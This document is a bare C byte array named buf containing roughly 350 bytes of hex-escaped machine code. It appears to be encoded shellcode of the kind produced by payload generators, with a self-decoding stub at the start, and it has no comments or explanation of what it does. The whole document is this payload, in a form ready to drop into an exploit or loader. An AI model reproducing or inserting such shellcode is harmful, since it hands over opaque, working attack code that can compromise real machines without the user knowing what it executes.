unsigned char buf[] =
"\xbb\x34\x2a\xa8\xe4\xda\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x37\x31\x58\x13\x83\xe8\xfc\x03\x58\x3b\xc8\x5d\x18\xab\x8e"
"\x9e\xe1\x2b\xef\x17\x04\x1a\x2f\x43\x4c\x0c\x9f\x07\x00\xa0"
"\x54\x45\xb1\x33\x18\x42\xb6\xf4\x97\xb4\xf9\x05\x8b\x85\x98"
"\x85\xd6\xd9\x7a\xb4\x18\x2c\x7a\xf1\x45\xdd\x2e\xaa\x02\x70"
"\xdf\xdf\x5f\x49\x54\x93\x4e\xc9\x89\x63\x70\xf8\x1f\xf8\x2b"
"\xda\x9e\x2d\x40\x53\xb9\x32\x6d\x2d\x32\x80\x19\xac\x92\xd9"
"\xe2\x03\xdb\xd6\x10\x5d\x1b\xd0\xca\x28\x55\x23\x76\x2b\xa2"
"\x5e\xac\xbe\x31\xf8\x27\x18\x9e\xf9\xe4\xff\x55\xf5\x41\x8b"
"\x32\x19\x57\x58\x49\x25\xdc\x5f\x9e\xac\xa6\x7b\x3a\xf5\x7d"
"\xe5\x1b\x53\xd3\x1a\x7b\x3c\x8c\xbe\xf7\xd0\xd9\xb2\x55\xbe"
"\x1c\x40\xe0\x8c\x1f\x5a\xeb\xa0\x77\x6b\x60\x2f\x0f\x74\xa3"
"\x14\xff\x3e\xee\x3c\x68\xe7\x7a\x7d\xf5\x18\x51\x41\x00\x9b"
"\x50\x39\xf7\x83\x10\x3c\xb3\x03\xc8\x4c\xac\xe1\xee\xe3\xcd"
"\x23\x80\x60\x12\xe1\x38\x46\x31\x94\xa6\xa8\xd0\x1e\x42\x94"
"\x2b\xe6\xbe\xfa\x7a\x2e\x87\x2c\x4b\x7d\xd9\x02\x80\xb1\x05"
"\x56\xd2\x82\x45";